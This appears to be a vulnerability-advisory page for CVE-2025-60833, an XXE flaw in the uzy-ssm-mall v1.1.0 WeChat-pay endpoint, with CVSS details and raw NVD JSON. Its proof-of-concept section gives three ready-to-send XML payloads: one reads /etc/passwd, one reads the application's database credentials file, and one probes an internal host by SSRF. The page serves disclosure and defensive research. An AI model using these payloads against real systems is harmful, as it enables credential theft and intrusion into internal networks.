Security Vulnerability Report
中文
CVE-2025-60833 CVSS 6.5 MEDIUM

CVE-2025-60833

Published: 2025-10-08 14:15:46
Last Modified: 2025-10-10 16:16:13

Description

An XML External Entity (XXE) vulnerability in the /mall/wxpay/pay component of uzy-ssm-mall v1.1.0 allows attackers to execute arbitrary code via supplying crafted XML data.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:ghostxbh:uzy-ssm-mall:1.1.0:*:*:*:*:*:*:* - VULNERABLE
uzy-ssm-mall v1.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
POST /mall/wxpay/pay HTTP/1.1 Host: target.com Content-Type: application/xml <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <xml> <return_code><![CDATA[SUCCESS]]></return_code> <return_msg><![CDATA[&xxe;]]></return_msg> </xml> --- // Another PoC: Read application config files POST /mall/wxpay/pay HTTP/1.1 Host: target.com Content-Type: application/xml <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///opt/tomcat/webapps/ROOT/WEB-INF/classes/jdbc.properties"> ]> <xml> <return_code><![CDATA[SUCCESS]]></return_code> <return_msg><![CDATA[&xxe;]]></return_msg> </xml> --- // SSRF-based PoC to probe internal network POST /mall/wxpay/pay HTTP/1.1 Host: target.com Content-Type: application/xml <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "http://192.168.1.1:8080/admin/"> ]> <xml> <return_code><![CDATA[SUCCESS]]></return_code> <return_msg><![CDATA[&xxe;]]></return_msg> </xml>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60833", "sourceIdentifier": "[email protected]", "published": "2025-10-08T14:15:46.020", "lastModified": "2025-10-10T16:16:13.290", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An XML External Entity (XXE) vulnerability in the /mall/wxpay/pay component of uzy-ssm-mall v1.1.0 allows attackers to execute arbitrary code via supplying crafted XML data."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-91"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ghostxbh:uzy-ssm-mall:1.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "53311903-07A9-46BA-9647-53697EC22BAF"}]}]}], "references": [{"url": "https://gist.github.com/ChangeYourWay/1364b9e78490ebd5cd31bcdc105a914f", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/ChangeYourWay/post/blob/main/uzy-ssm-mall.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}